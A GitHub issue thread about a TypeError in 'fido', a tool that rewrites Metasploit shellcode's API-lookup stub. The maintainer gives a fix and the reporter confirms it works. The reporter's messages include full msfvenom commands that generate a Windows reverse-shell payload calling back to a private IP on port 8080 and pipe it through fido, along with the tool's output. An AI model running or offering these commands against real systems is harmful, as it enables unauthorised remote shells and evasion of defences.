### ISSUE TITLE
TypeError: 'int' object is not subscriptable

### ISSUE THREAD

**Issue by i128** [secretsquirrel/fido#3]
I'm attempting to recreate based off of the youtube vids, but get the following errors.

msfvenom -p windows/shell_reverse_tcp LHOST=172.16.186.1 LPORT=8080 EXITFUNC=thread | ./fido.py -p LLAGPA > /tmp/test.bin
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes

[*] Length of submitted payload:324
[*] Stripping Stephen Fewers hash API call
[*] Disassembling payload
[*] Called APIs: ['kernel32.dll!LoadLibraryA', 'ws2_32.dll!WSAStartup', 'ws2_32.dll!WSASocketA', 'ws2_32.dll!connect', 'kernel32.dll!ExitProcess', 'kernel32.dll!CreateProcessA', 'kernel32.dll!WaitForSingleObject', 'kernel32.dll!ExitThread', 'kernel32.dll!GetVersion', 'ntdll.dll!RtlExitUserThread', 'ntdll.dll!RtlExitUserThread']
[*] String Table: b'WSASocketA\x00WaitForSingleObject\x00ExitThread\x00CreateProcessA\x00ExitProcess\x00RtlExitUserThread\x00LoadLibraryA\x00kernel32\x00ntdll\x00ws2_32\x00GetVersion\x00WSAStartup\x00connect\x00'
[*] Building lookup table
[*] Using LLAGPA Stub
[*] Assembling lookup table stub
Traceback (most recent call last):
  File "./fido.py", line 1365, in <module>
    test.doit()
  File "./fido.py", line 1294, in doit
    sys.stderr.write("Test: {0}".format(self.DLL_HASH['importname']))
TypeError: 'int' object is not subscriptable

The following is successful:

msfvenom -p windows/shell_reverse_tcp LHOST=172.16.186.1 LPORT=8080 EXITFUNC=thread | ./fido.py -p ExternGPA -l api-ms-win-core-libraryloader-l1-1-0.dll -d kernel32.dll -n > /tmp/test.bin
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes

[*] Length of submitted payload:324
[*] Stripping Stephen Fewers hash API call
[*] Disassembling payload
[*] Called APIs: ['kernel32.dll!LoadLibraryA', 'ws2_32.dll!WSAStartup', 'ws2_32.dll!WSASocketA', 'ws2_32.dll!connect', 'kernel32.dll!ExitProcess', 'kernel32.dll!CreateProcessA', 'kernel32.dll!WaitForSingleObject', 'kernel32.dll!ExitThread', 'kernel32.dll!GetVersion', 'ntdll.dll!RtlExitUserThread', 'ntdll.dll!RtlExitUserThread']
[*] String Table: b'WSASocketA\x00ntdll\x00ExitProcess\x00ExitThread\x00GetVersion\x00RtlExitUserThread\x00CreateProcessA\x00WaitForSingleObject\x00connect\x00kernel32\x00WSAStartup\x00ws2_32\x00LoadLibraryA\x00'
[*] Building lookup table
[*] You know your DLL target! Using kernel32.dll hash.
[*] Using ExternGPA from kernel32.dll hash: 0x6a4abc5b, import name: api-ms-win-core-libraryloader-l1-1-0.dll
[*] Assembling lookup table stub
Test: api-ms-win-core-libraryloader-l1-1-0.dll[*] Payload complete
[*] Output size: 762

So im not sure if its an issue with the payload itself or something else.

**Comment by secretsquirrel** [comment]
I know the problem. Will fix when I get to a terminal.

**Comment by secretsquirrel** [comment]
```
git pull 
```
The fix: https://github.com/secretsquirrel/fido/commit/053ba330e7086c6df99c2787d2f54a5d279df62e

**Comment by i128** [comment]
Awesome, just tested and verified it works! Thanks!

**Comment by secretsquirrel** [comment]
Np!
